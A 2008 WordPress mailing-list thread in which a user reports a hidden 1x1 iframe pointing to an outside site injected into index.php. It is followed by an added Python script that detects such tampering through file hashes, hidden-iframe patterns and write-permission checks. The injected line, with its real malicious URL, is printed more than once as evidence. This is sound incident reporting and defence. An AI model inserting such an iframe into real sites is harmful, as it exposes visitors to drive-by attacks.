[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 18:39:49 GMT 2008


Yes, that's exactly what I am saying. Here is my index.php:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>



I've commented the line out so I can keep it for future investigations.

Our passwords have NOT been compromised, as the only logins are from my
host and my friend's host. It could be an older version of a plugin,
though.

However, I had to report this, as maybe someone will encounter the same
problem.

Thanks.

On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
<wp-hackers at striderweb.com> wrote:
> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
> index.php)"
>
> Does this mean it shows up in the final rendered page, but not in the
> theme's file?  In that case, it's being added dynamically.  The link is not
> written in the theme.
>
> Just trying to clarify.  I'm no security guru... (IANASG)
>
> Stephen
>
> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>
>> If the file is writable for the webserver and file access is enabled on
>> the webserver: yes.
>
>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>
>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>
>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>
>>>> For some reason I found my blog's index.php (not theme's index.php)
>>>> with the following piece of code right before the ?>
>>>>
>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>
>>>> I tried looking at the logs. No luck. The file's permissions look like
>>>> this:
>>>>
>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>> /home/madalin/www/index.php
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

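The thread turns on two questions a defender would want to answer mechanically: has a core file such as index.php changed since the last known-good state, and could the webserver (or PHP running as the file's owner) have written to it given its mode and ownership? The script below is an added example, not code from the thread or from WordPress; it builds a SHA-256 manifest of PHP files, re-verifies it, flags hidden-iframe injections of the kind quoted above, and checks whether a given uid/gid set can write a file. The file contents, the `example.invalid` URL and the uid/gid values it uses are constructed for the demo.

```python
import hashlib
import os
import re
import stat
import tempfile
from pathlib import Path

# Constructed sample: a minimal index.php, and the same file with an injected
# echo placed right before the closing ?> (the placement described in the thread).
CLEAN_INDEX = """<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
"""
INJECTED_LINE = (
    r'echo "<iframe src=\"http://example.invalid/?click=0\" width=1 height=1 '
    r'style=\"visibility:hidden;position:absolute\"></iframe>";'
)
INJECTED_INDEX = CLEAN_INDEX.replace("?>", INJECTED_LINE + "\n?>")

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Attributes that make an iframe invisible to the visitor: 1x1 size or hidden styles.
HIDDEN_HINTS = re.compile(
    r"(?:\b(?:width|height)\s*=\s*[\"'\\]*1\b)|visibility\s*:\s*hidden|display\s*:\s*none",
    re.IGNORECASE,
)


def find_hidden_iframes(source: str) -> list[str]:
    """Return every <iframe ...> tag in `source` that carries a hiding attribute."""
    return [tag for tag in IFRAME_TAG.findall(source) if HIDDEN_HINTS.search(tag)]


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map each PHP file (relative POSIX path) under `root` to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in sorted(root.rglob("*.php"))}


def verify_manifest(root: Path, manifest: dict[str, str]) -> dict[str, str]:
    """Compare the tree against a baseline: ok / modified / missing / unexpected."""
    current = build_manifest(root)
    status = {}
    for rel, digest in manifest.items():
        if rel not in current:
            status[rel] = "missing"
        else:
            status[rel] = "ok" if current[rel] == digest else "modified"
    for rel in current:
        if rel not in manifest:
            status[rel] = "unexpected"
    return status


def webserver_can_write(st: os.stat_result, web_uid: int, web_gids: set[int]) -> bool:
    """True if a process with `web_uid` and supplementary `web_gids` may write the file.

    A 0644 file owned by the site user is still writable when PHP runs as that
    user (suexec/CGI setups), which is the case the thread discusses.
    """
    mode = st.st_mode
    if st.st_uid == web_uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in web_gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def run_demo() -> dict:
    """Baseline a clean tree, simulate the injection, and report what the checks see."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(CLEAN_INDEX)
        (root / "wp-blog-header.php").write_text("<?php\n// stub for the demo\n")
        manifest = build_manifest(root)

        # Simulate the tampering: the file keeps its owner and 0644 mode.
        (root / "index.php").write_text(INJECTED_INDEX)
        os.chmod(root / "index.php", 0o644)

        st = os.stat(root / "index.php")
        return {
            "status": verify_manifest(root, manifest),
            "iframes": len(find_hidden_iframes((root / "index.php").read_text())),
            # PHP running as the file owner (constructed uid/gid taken from the file itself)
            "owner_can_write": webserver_can_write(st, st.st_uid, {st.st_gid}),
            # PHP running as an unrelated account (constructed: owner uid + 1, gid + 1000)
            "other_uid_can_write": webserver_can_write(st, st.st_uid + 1, {st.st_gid + 1000}),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Run as a script it reports index.php as modified, one hidden iframe found, writable when PHP runs as the owner and not writable from an unrelated uid. Keep the manifest outside the web root (or in version control) so that whatever rewrote index.php cannot also rewrite the baseline.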
